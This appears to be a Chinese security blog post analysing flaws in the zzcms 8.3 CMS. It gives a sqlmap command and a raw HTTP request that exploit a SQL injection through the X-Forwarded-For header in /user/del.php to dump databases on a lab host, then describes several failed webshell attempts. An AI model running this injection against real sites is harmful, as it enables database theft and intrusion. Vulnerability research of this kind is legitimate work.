zzcms8.3的漏洞分析

正文:

参考:http://www.sec-redclub.com/archives/760/

一.版本下载(更新日期是18年6月20日)

http://www.zzcms.net/zx/7
修复了zzcms8.2的del.php注入漏洞

二.但是getip()的注入漏洞还是未修补

经过测试可以,直接跑出数据库来
sqlmap -r sqlmap_post.txt –batch –dbs –dbms=mysql
sqlmap_post.txt:

GET /user/del.php HTTP/1.1
Host: 192.168.74.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=mqhqkfllaq7paq2p03ohe551h7; bdshare_firstime=1534906979380; UserName=hello; PassWord=5d41402abc4b2a76b9719d911017c592
X-Forwarded-For: 111.111.111.111*
Connection: close
Upgrade-Insecure-Requests: 1

三.继续getshell

一.常规方法getshell(未成功)
1.上传图片必须为图片格式
抓包00截断,从左判断,失败
有一个数据库备份,页面显示未找到,不清楚原因,可以尝试它
2.模板写入必须了htm和css格式,估计抓包还是从左开始判断,所以未尝试
3.各种地方写一句话,会把<>html实例化,转化为&lt等
想起xss中过这个可以\x3e等,但是测试后未转化为<
4.sqlmap getshell一下
不出所料,没有权限写
2)
尝试回收站
C:\$Recycle.Bin\
无法写入
二.安装漏洞getshell,未测试8.3修复没有,不过一般安装漏洞getshell都太太少见,所以不再测试
 
 
2018.8.22

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注